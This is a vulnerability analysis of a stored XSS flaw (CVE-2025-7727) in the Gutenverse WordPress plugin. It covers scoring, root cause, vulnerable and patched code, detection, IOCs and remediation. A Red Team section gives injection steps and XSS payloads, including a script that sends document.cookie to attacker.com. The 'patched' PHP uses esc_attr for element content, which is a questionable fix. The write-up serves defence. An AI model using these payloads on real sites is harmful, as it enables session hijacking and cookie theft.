CVE-2025-7727
Executive Summary
CVE-2025-7727 is a Stored Cross-Site Scripting (XSS) vulnerability affecting the Gutenverse plugin for WordPress, up to and including version 3.1.0. The flaw resides in the plugin's "Animated Text" and "Fun Fact" Gutenberg blocks. Insufficient input sanitization and output escaping on user-supplied attributes allow authenticated attackers with at least Contributor-level access to inject arbitrary web scripts. These scripts execute whenever a user accesses a page containing the malicious block, leading to potential session hijacking, defacement, or data theft.
This vulnerability is part of the WordPress ecosystem and does not involve Apache or Nginx directly. The plugin's blocks fail to properly escape user-controlled attributes before rendering them in the DOM.

CVSS Breakdown & Threat Level
- CVSS Score: 6.4 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (Contributor-level)
- User Interaction: None
- Scope: Changed (impact on other components)
- Confidentiality Impact: Low
- Integrity Impact: Low
- Availability Impact: None
Threat Level: Medium. While the CVSS score is moderate, the ability for authenticated users to inject persistent scripts without user interaction increases the risk in multi-author WordPress environments.
Deep Dive & Mechanics
The Gutenverse plugin registers custom Gutenberg blocks, including "Animated Text" and "Fun Fact". These blocks accept user-defined attributes (e.g., text content, animation settings) that are rendered directly into the page HTML. The vulnerability arises because the plugin does not sanitize or escape these attributes before output.
Attack Flow:
- An attacker with Contributor-level access (or higher) creates or edits a post/page.
- The attacker inserts an "Animated Text" or "Fun Fact" block.
- In the block's attribute field (e.g.,
textorcontent), the attacker injects a malicious payload like<img src=x onerror=alert('XSS')>. - The plugin stores the payload in the WordPress database without proper sanitization.
- When any user (including administrators) views the page, the payload executes in their browser context.
Root Cause: The plugin uses dangerouslySetInnerHTML or similar React/JavaScript methods to render block attributes without escaping. The server-side PHP code also fails to apply esc_attr() or wp_kses() on the attributes before saving.
Vulnerable vs. Patched Code
Vulnerable Code (PHP side - example from block render):
// In gutenverse/includes/blocks/class-animated-text.php
public function render($attributes) {
$text = $attributes['text']; // No sanitization
return '<div class="gutenverse-animated-text">' . $text . '</div>';
}
Patched Code (expected fix):
// In gutenverse/includes/blocks/class-animated-text.php
public function render($attributes) {
$text = esc_attr($attributes['text']); // Escape attribute
return '<div class="gutenverse-animated-text">' . $text . '</div>';
}
JavaScript side (vulnerable):
// In assets/js/blocks/animated-text.js
const { text } = attributes;
return <div className="gutenverse-animated-text" dangerouslySetInnerHTML={{ __html: text }} />;
Patched JavaScript:
// In assets/js/blocks/animated-text.js
const { text } = attributes;
return <div className="gutenverse-animated-text">{ text }</div>;
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- WordPress instance with Gutenverse plugin <= 3.1.0
- Contributor-level account credentials
Steps:
- Log in as a Contributor.
- Create a new post.
- Add an "Animated Text" block.
- In the text attribute, inject:
<img src=x onerror=alert(document.cookie)> - Publish the post.
- When an admin or other user views the post, the XSS triggers.
Advanced Payload (session hijacking):
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Blue Team (Detection & Hardening)
Detection:
- Monitor for posts containing
<script>or event handlers in block attributes. - Use WAF rules to block common XSS patterns in post content.
Hardening:
- Apply the principle of least privilege: restrict Contributor-level access.
- Use a WordPress security plugin that scans for XSS in post content.
- Implement Content Security Policy (CSP) headers to mitigate script execution.
Indicators of Compromise (IOCs)
- Post content containing:
<img src=x onerror=...>or<script>...</script>in Gutenverse block attributes. - HTTP requests to:
wp-json/wp/v2/postswith payloads in block attribute fields. - Log entries: Suspicious post revisions with JavaScript in block data.
- File hashes: Modified
class-animated-text.phporclass-fun-fact.phpin/wp-content/plugins/gutenverse/includes/blocks/.

Remediation & Mitigation
Immediate Actions:
- Disable the Gutenverse plugin until a patch is available.
- Review all posts created by Contributor-level users for malicious content.
- Implement a Web Application Firewall (WAF) rule to block XSS patterns in post content.
Long-term Fix:
- The vendor must release a patched version (>= 3.1.1) that properly escapes block attributes.
- Apply
esc_attr()in PHP and avoiddangerouslySetInnerHTMLin React components.
Workaround:
- Use a WordPress security plugin (e.g., Wordfence) to block XSS in post content.
- Restrict Contributor-level access to trusted users only.
